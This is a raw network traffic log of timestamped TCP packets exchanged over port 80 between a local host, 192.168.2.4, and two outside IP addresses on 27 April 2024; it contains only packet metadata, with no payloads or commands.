Apr 27, 2024 02:19:21.544893980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.544895887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.544971943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.545013905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.586508989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.586565971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.586642027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.586689949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.586796999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.586846113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.630278111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.630337954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.681448936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.681483984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.681530952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.681530952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.702460051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.702476025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.702531099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.706885099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.706948996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.742589951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.742605925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.742671967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.742710114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.742723942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.742867947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.742867947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.742892981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.742933035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.757195950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.757365942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.757385015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.757426023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.757486105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.757536888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.801558971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.801645041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.801677942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.801733971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.854068995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.854325056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.898845911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.898895979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.898927927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.898993015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.930229902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.930310965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.930418015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.930485010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.937688112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.937798023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.938478947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.938534975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.938541889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.938580990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.973714113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.973802090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.027200937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.027251005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.027313948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.027355909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.095421076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.095482111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.095515966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.095560074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.102618933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.102684021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.133886099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.133946896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.134380102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.134469032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.134522915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.134591103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.134634018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.144862890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.144933939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.198365927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.198451996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.198453903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.198508024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.277144909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.277239084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.290502071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.290617943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.290678024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.317327023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.317399979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.329471111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.329737902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.329797029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.329876900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.330028057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.330082893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.330105066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.371449947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.371663094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.371737003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.448699951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.448760986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.448803902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.448856115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.487507105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.487576008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.487644911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.489568949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.489586115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.489631891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.489665985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.525927067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.526019096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.526071072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.526139975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.526246071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.526287079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.526436090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.543574095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.543637991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.566901922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.566984892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.621222019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.621315956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.621320963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.621330976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.621361971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.621406078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.661885977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.661967039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.682888985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.683248043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.683307886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.715409040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.715476036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.715495110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.715627909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.720535994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.720658064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.720733881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.720798016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.720875978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.720927000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.763417959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.763520002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.763572931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.763605118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.794323921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.794514894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.794786930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.794800997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.794867039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.808940887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.833901882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.833972931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.834043026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.834120035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.878644943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.878825903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.878886938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.886918068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.886986017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.916054010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.916178942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.916251898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.916275024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.916361094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.916410923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.960576057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.960592985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:22.960671902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:22.966085911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.966104031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.966161966 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.966167927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.966192007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.966196060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:22.966209888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:22.966249943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.004899979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.005517960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.005600929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.058950901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.060165882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.060236931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.060275078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.060333967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.074204922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.074265957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.074335098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.112566948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.112611055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.112679005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.112746954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.112886906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.112937927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.139681101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.139781952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.139843941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.139880896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.139919996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.139978886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.156483889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.156543016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.156594038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.177093983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.177175045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.177251101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.177309036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.231597900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.231690884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.254059076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.270046949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.270061970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.270117044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.307737112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.307816029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.307842016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.308234930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.308249950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.308276892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.311777115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.311836958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.311851025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.311908960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.312002897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.312017918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.312098026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.312208891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.349978924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.350061893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.351571083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.351591110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.351639986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.402787924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.404149055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.404232979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.464545012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.464560986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.464680910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.482553959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.482621908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.482768059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.482827902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.482927084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.482980013 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.503657103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.503745079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.503803968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.504323959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.504419088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.504472971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.521545887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.521617889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.521645069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.521711111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.547720909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.547739983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.547785044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.547847033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.575890064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.575970888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.590188026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.597940922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.625262022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.625353098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.652694941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.653835058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.653912067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.654170990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.654232025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.660069942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.699521065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.699563026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.699608088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.699666977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.699764967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.699779034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.699819088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.699848890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.742444992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.742511988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.742616892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.747006893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.747081995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.785649061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.785728931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.797944069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.798015118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.825385094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.825478077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.825491905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.825546026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.847287893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.847450972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.895220995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.895243883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.895286083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.895301104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.895314932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.895323992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.895391941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.895411968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.918255091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.918273926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.918390036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.949592113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:23.970427990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.970546007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.981473923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:23.997049093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.997128963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:23.997395039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:23.997467995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.027832985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.042469025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.089694023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.089744091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.089776993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.089818954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.090179920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.090815067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.090858936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.090899944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.090915918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.090936899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.091007948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.141037941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.141113043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.141144037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.141236067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.144232035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.144323111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.144383907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.168437004 CEST	80	49733	185.172.128.76	192.168.2.4
